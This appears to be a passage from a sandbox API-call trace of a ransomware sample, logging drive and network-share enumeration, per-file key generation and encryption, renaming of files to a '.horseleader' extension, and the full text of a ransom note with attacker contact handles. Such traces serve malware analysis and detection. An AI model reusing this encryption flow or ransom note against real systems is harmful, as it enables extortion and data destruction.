(lpString="JWlzFd8ig4lNkIDqwk+OENg4xlYNIx+NYIIF2OITBbD5JB7PBCcH3DgT1yh4fLafWmPtVPJJ4wOSwYaLTam0t4RSiLOfjpC/u2+qPesk2aAejZmqIsYtucFLyI+7BoJGZuIs+z9UEuIYWzSdwDBewCphBxeDDT4RZKXmvwqf4jlsmMcXrEAhZNUu3GWL2bfT2aSDm7Nq4x24t44ckuClkeUi1Qzl0yyj4LLiRZeENVv89loGfBrMZaDRfyPQg7w6IvoUnqffqS6sB9AH7TSxebCaoSfiqXOdCWmMZ27T/s4SMrW2QbW4ZPfEKQpA3q3P8MFwfbpLyqo9cSAaxeQE84jYCoIM+xygruhfWrdJgxEOP5npcM30AAcVQNFpTKCiruCOXwCgc9ZqZJPow02eJYtG83PAxpXrbJ0w+7vGDZUYIcPyX8U+xDg1W0HEDDlYsCmRoIoJefUdFCIhWH4HyqGOnyx5UPzBzKgzM/72Q+a3rRwLTDj0v/rk6/dW8ghlTdAhxo0zl+DrJf9wFOIt0oAXQXL/rww96vUHb3jSE3i9GLhsVCDQ0RuW/fQsohzJ17oNguBmOwN0Hry/hzP2EgUgzLKERaymnsmN2W315Oz6XYg3+ZDJ8eP02rTITXKNRplxtQ/9dBgsF7EnQTuEDkHTEEbisTnKOL9aoou2ZDRK9BtknsYZhYquE/b2YEU0OWgNpGBYVvbG8BrVUl59OfojuYOtXVE41A6fIwMW0q9pd9ZLP6VJHEwQF6Vo5bzoDphmaO3dmDJMhY+6Xfm9EEb9aGu9i7TbvL6ZZOgO7i8T2szsq/ikGzrk3Jy68HWJRuwGKpD0irJUgHAs0fMqO2UBeA6onVYxtk1wVEJ1YLKDhuEZFda91rxQUDKVp1VfFvwuLLk0v86XsRDh5/++cwIBhMBVQiEtr7b9CfuF2H1z/VPELTk9Inx7LS725YE2gZwJqwDRLN3xeFColVc+AFRQ3zH/IcGVB1QD3lG32ko7AaR7ZhR5HgyMnGjVT0rBCUdj3uoYipP9UeOtxFa2ZfsOzaqCAqSnLCw9UZyUwj/qFxNvJ+ejulcfIYsVZHpkW5iyJKcyuIXs/KOuy/hpeUS7qDsDp1MoRkYrHisBbP5MXcQlCYgSq+IgkVqjapXZHXac8G9CvZdqMUyJahaJeW5PujhPfXK0kJB+aLqpVvF1uFiyCf1I2gVENNFf6hOjImA1x7BGRN6fA/qbuPUMcyGX9QECp6+o4xtyFp5jE5MGy6f9REEF/D7D/7V0JSoFaoylGz8JreWMeKNvJi1ek/ExUWrZOwxK8lYKKw6EeEPxXFlORrPY5TRR1GPxOvYz6hQ1aQYKSqXK5dEzwMWZjA==") returned 1368 [0114.349] WriteFile (in: hFile=0x178, lpBuffer=0x7d1740*, nNumberOfBytesToWrite=0x559, lpNumberOfBytesWritten=0x39fccc, lpOverlapped=0x0 | out: lpBuffer=0x7d1740*, lpNumberOfBytesWritten=0x39fccc*=0x559, lpOverlapped=0x0) returned 1 [0114.350] WriteFile (in: hFile=0x178, lpBuffer=0x7c6378*, nNumberOfBytesToWrite=0x94, lpNumberOfBytesWritten=0x39fccc, lpOverlapped=0x0 | out: lpBuffer=0x7c6378*, lpNumberOfBytesWritten=0x39fccc*=0x94, lpOverlapped=0x0) returned 1 [0114.351] CloseHandle (hObject=0x178) returned 1 [0114.355] GetProcessHeap () returned 0x780000 [0114.355] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7c6378 | out: hHeap=0x780000) returned 1 [0114.355] GetProcessHeap () returned 0x780000 [0114.355] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79f840 | out: hHeap=0x780000) returned 1 [0114.356] GetProcessHeap () returned 0x780000 [0114.356] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7c9438 | out: hHeap=0x780000) returned 1 [0114.356] SHGetFolderPathW (in: hwnd=0x0, csidl=0, hToken=0x0, dwFlags=0x0, pszPath=0xdf44c8 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x0 [0114.356] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xb438b7, lpParameter=0x0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x178 [0114.357] GetLogicalDrives () returned 0x4 [0114.357] GetProcessHeap () returned 0x780000 [0114.357] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x248) returned 0x7d1ce8 [0114.381] wnsprintfW (in: pszDest=0x7d1ce8, cchDest=260, pszFmt="\\\\?\\%c:" | out: pszDest="\\\\?\\C:") returned 6 [0114.381] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xb436ea, lpParameter=0x7d1ce8, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1d4 [0114.384] WaitForMultipleObjects (nCount=0x2, lpHandles=0x39f08c*=0x178, bWaitAll=1, dwMilliseconds=0xffffffff) Thread: id = 4 os_tid = 0x9e4 Thread: id = 5 os_tid = 0xaa8 Thread: id = 7 os_tid = 0x598 Thread: id = 13 os_tid = 0x5cc [0114.443] WNetOpenEnumW (in: dwScope=0x2, dwType=0x0, dwUsage=0x13, lpNetResource=0x0, lphEnum=0x305f824 | out: lphEnum=0x305f824*=0x7c6760) returned 0x0 [0126.089] GetProcessHeap () returned 0x780000 [0126.090] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x4040) returned 0x7d7fd8 [0126.092] WNetEnumResourceW (in: hEnum=0x7c6760, lpcCount=0x305f81c, lpBuffer=0x7d7fd8, lpBufferSize=0x305f820 | out: lpcCount=0x305f81c, lpBuffer=0x7d7fd8, lpBufferSize=0x305f820) returned 0x0 [0126.092] WNetOpenEnumW (in: dwScope=0x2, dwType=0x0, dwUsage=0x13, lpNetResource=0x7d7fd8, lphEnum=0x305f7fc | out: lphEnum=0x305f7fc*=0x7a2cf0) returned 0x0 [0126.582] GetProcessHeap () returned 0x780000 [0126.583] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x4040) returned 0x7dc020 [0126.584] WNetEnumResourceW (in: hEnum=0x7a2cf0, lpcCount=0x305f7f4, lpBuffer=0x7dc020, lpBufferSize=0x305f7f8 | out: lpcCount=0x305f7f4, lpBuffer=0x7dc020, lpBufferSize=0x305f7f8) returned 0x103 [0126.584] GetProcessHeap () returned 0x780000 [0126.584] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc020 | out: hHeap=0x780000) returned 1 [0126.584] WNetCloseEnum (hEnum=0x7a2cf0) returned 0x0 [0126.584] WNetOpenEnumW (in: dwScope=0x2, dwType=0x0, dwUsage=0x13, lpNetResource=0x7d7ff8, lphEnum=0x305f7fc | out: lphEnum=0x305f7fc*=0x7a2cf0) returned 0x4b8 [0160.998] WNetOpenEnumW (in: dwScope=0x2, dwType=0x0, dwUsage=0x13, lpNetResource=0x7d8018, lphEnum=0x305f7fc | out: lphEnum=0x305f7fc*=0x7a2cf0) returned 0x4c6 [0161.019] WNetEnumResourceW (in: hEnum=0x7c6760, lpcCount=0x305f81c, lpBuffer=0x7d7fd8, lpBufferSize=0x305f820 | out: lpcCount=0x305f81c, lpBuffer=0x7d7fd8, lpBufferSize=0x305f820) returned 0x103 [0161.019] GetProcessHeap () returned 0x780000 [0161.019] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7d7fd8 | out: hHeap=0x780000) returned 1 [0161.019] WNetCloseEnum (hEnum=0x7c6760) returned 0x0 Thread: id = 14 os_tid = 0x700 [0118.402] lstrcmpW (lpString1="\\\\?\\C:", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned -1 [0118.403] GetProcessHeap () returned 0x780000 [0118.403] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7c7d50 [0118.403] wnsprintfW (in: pszDest=0x7c7d50, cchDest=1024, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\*") returned 8 [0118.403] FindFirstFileW (in: lpFileName="\\\\?\\C:\\*", lpFindFileData=0x32af7f8 | out: lpFindFileData=0x32af7f8*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xd29f5adc, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x2dfdd420, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2dfdd420, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="$Recycle.Bin", cAlternateFileName="")) returned 0x7c66a0 [0118.403] lstrcmpiW (lpString1="$Recycle.Bin", lpString2="Windows") returned -1 [0118.403] wnsprintfW (in: pszDest=0x7c7d50, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\$Recycle.Bin") returned 19 [0118.404] lstrcmpW (lpString1="$Recycle.Bin", lpString2=".") returned -1 [0118.404] lstrcmpW (lpString1="$Recycle.Bin", lpString2="..") returned -1 [0118.404] lstrcmpW (lpString1="\\\\?\\C:\\$Recycle.Bin", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned -1 [0118.404] GetProcessHeap () returned 0x780000 [0118.404] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7c8598 [0118.404] wnsprintfW (in: pszDest=0x7c8598, cchDest=1024, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\$Recycle.Bin\\*") returned 21 [0118.404] FindFirstFileW (in: lpFileName="\\\\?\\C:\\$Recycle.Bin\\*", lpFindFileData=0x32af580 | out: lpFindFileData=0x32af580*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xd29f5adc, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x2dfdd420, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2dfdd420, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x650052, dwReserved1=0x790063, cFileName=".", cAlternateFileName="")) returned 0x7c66e0 [0118.405] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0118.405] wnsprintfW (in: pszDest=0x7c8598, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\$Recycle.Bin\\.") returned 21 [0118.405] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0118.405] StrStrIW (lpFirst=".", lpSrch=".horseleader") returned 0x0 [0118.405] lstrcmpW (lpString1=".", lpString2="#Decrypt#.txt") returned 1 [0118.405] lstrcmpW (lpString1=".", lpString2="_uninstalling_.png") returned -1 [0118.406] lstrlenW (lpString=".testttjffg") returned 11 [0118.406] StrStrW (lpFirst="\\\\?\\C:\\$Recycle.Bin\\.", lpSrch=".testttjffg") returned 0x0 [0118.406] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32af478 | out: pbBuffer=0x32af478) returned 1 [0118.408] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32af478*, pdwDataLen=0x32af534*=0x24, dwBufLen=0x80 | out: pbData=0x32af478*, pdwDataLen=0x32af534*=0x80) returned 1 [0118.408] CreateFileW (lpFileName="\\\\?\\C:\\$Recycle.Bin\\." (normalized: "c:\\$recycle.bin\\."), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0118.408] FindNextFileW (in: hFindFile=0x7c66e0, lpFindFileData=0x32af580 | out: lpFindFileData=0x32af580*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xd29f5adc, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x2dfdd420, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2dfdd420, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x650052, dwReserved1=0x790063, cFileName="..", cAlternateFileName="")) returned 1 [0118.408] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0118.408] wnsprintfW (in: pszDest=0x7c8598, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\$Recycle.Bin\\..") returned 22 [0118.408] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0118.409] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0118.409] StrStrIW (lpFirst="..", lpSrch=".horseleader") returned 0x0 [0118.409] lstrcmpW (lpString1="..", lpString2="#Decrypt#.txt") returned 1 [0118.409] lstrcmpW (lpString1="..", lpString2="_uninstalling_.png") returned -1 [0118.409] lstrlenW (lpString=".testttjffg") returned 11 [0118.409] StrStrW (lpFirst="\\\\?\\C:\\$Recycle.Bin\\..", lpSrch=".testttjffg") returned 0x0 [0118.409] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32af478 | out: pbBuffer=0x32af478) returned 1 [0118.409] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32af478*, pdwDataLen=0x32af534*=0x24, dwBufLen=0x80 | out: pbData=0x32af478*, pdwDataLen=0x32af534*=0x80) returned 1 [0118.409] CreateFileW (lpFileName="\\\\?\\C:\\$Recycle.Bin\\.." (normalized: "c:"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0118.409] FindNextFileW (in: hFindFile=0x7c66e0, lpFindFileData=0x32af580 | out: lpFindFileData=0x32af580*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x2dfdd420, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xb63e4b00, ftLastAccessTime.dwHighDateTime=0x1d337f4, ftLastWriteTime.dwLowDateTime=0xb63e4b00, ftLastWriteTime.dwHighDateTime=0x1d337f4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x650052, dwReserved1=0x790063, cFileName="S-1-5-21-3388679973-3930757225-3770151564-1000", cAlternateFileName="S-1-5-~1")) returned 1 [0118.410] lstrcmpiW (lpString1="S-1-5-21-3388679973-3930757225-3770151564-1000", lpString2="Windows") returned -1 [0118.410] wnsprintfW (in: pszDest=0x7c8598, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\$Recycle.Bin\\S-1-5-21-3388679973-3930757225-3770151564-1000") returned 66 [0118.410] lstrcmpW (lpString1="S-1-5-21-3388679973-3930757225-3770151564-1000", lpString2=".") returned 1 [0118.410] lstrcmpW (lpString1="S-1-5-21-3388679973-3930757225-3770151564-1000", lpString2="..") returned 1 [0118.410] lstrcmpW (lpString1="\\\\?\\C:\\$Recycle.Bin\\S-1-5-21-3388679973-3930757225-3770151564-1000", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned -1 [0118.410] GetProcessHeap () returned 0x780000 [0118.410] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7b67f0 [0118.410] wnsprintfW (in: pszDest=0x7b67f0, cchDest=1024, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\$Recycle.Bin\\S-1-5-21-3388679973-3930757225-3770151564-1000\\*") returned 68 [0118.410] FindFirstFileW (in: lpFileName="\\\\?\\C:\\$Recycle.Bin\\S-1-5-21-3388679973-3930757225-3770151564-1000\\*", lpFindFileData=0x32af308 | out: lpFindFileData=0x32af308*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x2dfdd420, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xb63e4b00, ftLastAccessTime.dwHighDateTime=0x1d337f4, ftLastWriteTime.dwLowDateTime=0xb63e4b00, ftLastWriteTime.dwHighDateTime=0x1d337f4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x7c6720 [0118.411] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0118.411] wnsprintfW (in: pszDest=0x7b67f0, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\$Recycle.Bin\\S-1-5-21-3388679973-3930757225-3770151564-1000\\.") returned 68 [0118.411] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0118.411] StrStrIW (lpFirst=".", lpSrch=".horseleader") returned 0x0 [0118.411] lstrcmpW (lpString1=".", lpString2="#Decrypt#.txt") returned 1 [0118.411] lstrcmpW (lpString1=".", lpString2="_uninstalling_.png") returned -1 [0118.411] lstrlenW (lpString=".testttjffg") returned 11 [0118.411] StrStrW (lpFirst="\\\\?\\C:\\$Recycle.Bin\\S-1-5-21-3388679973-3930757225-3770151564-1000\\.", lpSrch=".testttjffg") returned 0x0 [0118.411] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32af200 | out: pbBuffer=0x32af200) returned 1 [0118.411] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32af200*, pdwDataLen=0x32af2bc*=0x24, dwBufLen=0x80 | out: pbData=0x32af200*, pdwDataLen=0x32af2bc*=0x80) returned 1 [0118.412] CreateFileW (lpFileName="\\\\?\\C:\\$Recycle.Bin\\S-1-5-21-3388679973-3930757225-3770151564-1000\\." (normalized: "c:\\$recycle.bin\\s-1-5-21-3388679973-3930757225-3770151564-1000\\."), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0118.412] FindNextFileW (in: hFindFile=0x7c6720, lpFindFileData=0x32af308 | out: lpFindFileData=0x32af308*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x2dfdd420, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xb63e4b00, ftLastAccessTime.dwHighDateTime=0x1d337f4, ftLastWriteTime.dwLowDateTime=0xb63e4b00, ftLastWriteTime.dwHighDateTime=0x1d337f4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0118.412] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0118.412] wnsprintfW (in: pszDest=0x7b67f0, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\$Recycle.Bin\\S-1-5-21-3388679973-3930757225-3770151564-1000\\..") returned 69 [0118.412] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0118.412] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0118.413] StrStrIW (lpFirst="..", lpSrch=".horseleader") returned 0x0 [0118.413] lstrcmpW (lpString1="..", lpString2="#Decrypt#.txt") returned 1 [0118.413] lstrcmpW (lpString1="..", lpString2="_uninstalling_.png") returned -1 [0118.413] lstrlenW (lpString=".testttjffg") returned 11 [0118.413] StrStrW (lpFirst="\\\\?\\C:\\$Recycle.Bin\\S-1-5-21-3388679973-3930757225-3770151564-1000\\..", lpSrch=".testttjffg") returned 0x0 [0118.413] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32af200 | out: pbBuffer=0x32af200) returned 1 [0118.413] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32af200*, pdwDataLen=0x32af2bc*=0x24, dwBufLen=0x80 | out: pbData=0x32af200*, pdwDataLen=0x32af2bc*=0x80) returned 1 [0118.413] CreateFileW (lpFileName="\\\\?\\C:\\$Recycle.Bin\\S-1-5-21-3388679973-3930757225-3770151564-1000\\.." (normalized: "c:\\$recycle.bin"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0118.414] FindNextFileW (in: hFindFile=0x7c6720, lpFindFileData=0x32af308 | out: lpFindFileData=0x32af308*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x2dfdd420, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2dfdd420, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2dfdd420, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x81, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0118.414] lstrcmpiW (lpString1="desktop.ini", lpString2="Windows") returned -1 [0118.414] wnsprintfW (in: pszDest=0x7b67f0, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\$Recycle.Bin\\S-1-5-21-3388679973-3930757225-3770151564-1000\\desktop.ini") returned 78 [0118.414] StrStrIW (lpFirst="desktop.ini", lpSrch=".horseleader") returned 0x0 [0118.414] lstrcmpW (lpString1="desktop.ini", lpString2="#Decrypt#.txt") returned 1 [0118.414] lstrcmpW (lpString1="desktop.ini", lpString2="_uninstalling_.png") returned 1 [0118.414] lstrlenW (lpString=".testttjffg") returned 11 [0118.414] StrStrW (lpFirst="\\\\?\\C:\\$Recycle.Bin\\S-1-5-21-3388679973-3930757225-3770151564-1000\\desktop.ini", lpSrch=".testttjffg") returned 0x0 [0118.414] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32af200 | out: pbBuffer=0x32af200) returned 1 [0118.414] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32af200*, pdwDataLen=0x32af2bc*=0x24, dwBufLen=0x80 | out: pbData=0x32af200*, pdwDataLen=0x32af2bc*=0x80) returned 1 [0118.415] CreateFileW (lpFileName="\\\\?\\C:\\$Recycle.Bin\\S-1-5-21-3388679973-3930757225-3770151564-1000\\desktop.ini" (normalized: "c:\\$recycle.bin\\s-1-5-21-3388679973-3930757225-3770151564-1000\\desktop.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1dc [0118.415] lstrlenW (lpString="\\\\?\\C:\\$Recycle.Bin\\S-1-5-21-3388679973-3930757225-3770151564-1000\\desktop.ini") returned 78 [0118.415] StrStrW (lpFirst="desktop.ini", lpSrch=".txt") returned 0x0 [0118.415] GetFileSizeEx (in: hFile=0x1dc, lpFileSize=0x32af2c0 | out: lpFileSize=0x32af2c0*=129) returned 1 [0118.415] ReadFile (in: hFile=0x1dc, lpBuffer=0x32aa200, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32af2e4, lpOverlapped=0x0 | out: lpBuffer=0x32aa200*, lpNumberOfBytesRead=0x32af2e4*=0x81, lpOverlapped=0x0) returned 1 [0118.417] SetFilePointerEx (in: hFile=0x1dc, liDistanceToMove=0xffffff7f, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0118.417] WriteFile (in: hFile=0x1dc, lpBuffer=0x32aa200*, nNumberOfBytesToWrite=0x81, lpNumberOfBytesWritten=0x32af2e4, lpOverlapped=0x0 | out: lpBuffer=0x32aa200*, lpNumberOfBytesWritten=0x32af2e4*=0x81, lpOverlapped=0x0) returned 1 [0118.417] SetFilePointerEx (in: hFile=0x1dc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0118.418] WriteFile (in: hFile=0x1dc, lpBuffer=0x32af2b8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32af2e4, lpOverlapped=0x0 | out: lpBuffer=0x32af2b8*, lpNumberOfBytesWritten=0x32af2e4*=0x4, lpOverlapped=0x0) returned 1 [0118.418] WriteFile (in: hFile=0x1dc, lpBuffer=0x32af200*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32af2e4, lpOverlapped=0x0 | out: lpBuffer=0x32af200*, lpNumberOfBytesWritten=0x32af2e4*=0x80, lpOverlapped=0x0) returned 1 [0118.418] CloseHandle (hObject=0x1dc) returned 1 [0118.428] GetProcessHeap () returned 0x780000 [0118.428] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x795d70 [0118.428] wnsprintfW (in: pszDest=0x795d70, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\$Recycle.Bin\\S-1-5-21-3388679973-3930757225-3770151564-1000\\desktop.ini.horseleader") returned 90 [0118.428] MoveFileW (lpExistingFileName="\\\\?\\C:\\$Recycle.Bin\\S-1-5-21-3388679973-3930757225-3770151564-1000\\desktop.ini" (normalized: "c:\\$recycle.bin\\s-1-5-21-3388679973-3930757225-3770151564-1000\\desktop.ini"), lpNewFileName="\\\\?\\C:\\$Recycle.Bin\\S-1-5-21-3388679973-3930757225-3770151564-1000\\desktop.ini.horseleader" (normalized: "c:\\$recycle.bin\\s-1-5-21-3388679973-3930757225-3770151564-1000\\desktop.ini.horseleader")) returned 1 [0119.220] GetProcessHeap () returned 0x780000 [0119.220] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x795d70 | out: hHeap=0x780000) returned 1 [0119.220] FindNextFileW (in: hFindFile=0x7c6720, lpFindFileData=0x32af308 | out: lpFindFileData=0x32af308*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x2dfdd420, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2dfdd420, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2dfdd420, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x81, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 0 [0119.221] FindClose (in: hFindFile=0x7c6720 | out: hFindFile=0x7c6720) returned 1 [0119.221] wnsprintfW (in: pszDest=0x7b67f0, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\$Recycle.Bin\\S-1-5-21-3388679973-3930757225-3770151564-1000\\#Decrypt#.txt") returned 80 [0119.221] CreateFileW (lpFileName="\\\\?\\C:\\$Recycle.Bin\\S-1-5-21-3388679973-3930757225-3770151564-1000\\#Decrypt#.txt" (normalized: "c:\\$recycle.bin\\s-1-5-21-3388679973-3930757225-3770151564-1000\\#decrypt#.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x200 [0119.795] lstrlenA (lpString="All your files have been ENCRYPTED!!!\r\nWrite to our ICQ @Horseleader\r\nOr contact us via jabber - horseleader@xmpp.jp\r\nJabber client installation instructions:\r\nDownload the jabber (Pidgin) client from https://pidgin.im/download/windows/ \r\n\r\nAfter installation, the Pidgin client will prompt you to create a new account. \r\nClick - Add\r\nIn the -Protocol field, select XMPP \r\nIn -Username - come up with any name \r\nIn the field -domain - enter any jabber-server, there are a lot of them, for example - exploit.im \r\nCreate a password\r\nAt the bottom, put a tick -Create account \r\nClick add \r\nIf you selected -domain - exploit.im, then a new window should appear in which you will need to re-enter your data: \r\nUser \r\npassword \r\nYou will need to follow the link to the captcha (there you will see the characters that you need to enter in the field below) \r\nIf you don't understand our Pidgin client installation instructions, you can find many installation tutorials on youtube - https://www.youtube.com/results?search_query=pidgin+jabber+install \r\nIf you have not received a response from us then we may have technical problems and please write to us using Jaber here bigbosshorse@xmpp.jp or on icq \r\nAttention!\r\nDo not rename encrypted files. \r\nDo not try to decrypt your data using third party software, it may cause permanent data loss. \r\nDecryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam. \r\ntell your unique ID\r\n") returned 1508 [0119.795] WriteFile (in: hFile=0x200, lpBuffer=0xb41ca0*, nNumberOfBytesToWrite=0x5e4, lpNumberOfBytesWritten=0x32af300, lpOverlapped=0x0 | out: lpBuffer=0xb41ca0*, lpNumberOfBytesWritten=0x32af300*=0x5e4, lpOverlapped=0x0) returned 1 [0119.796] lstrlenA 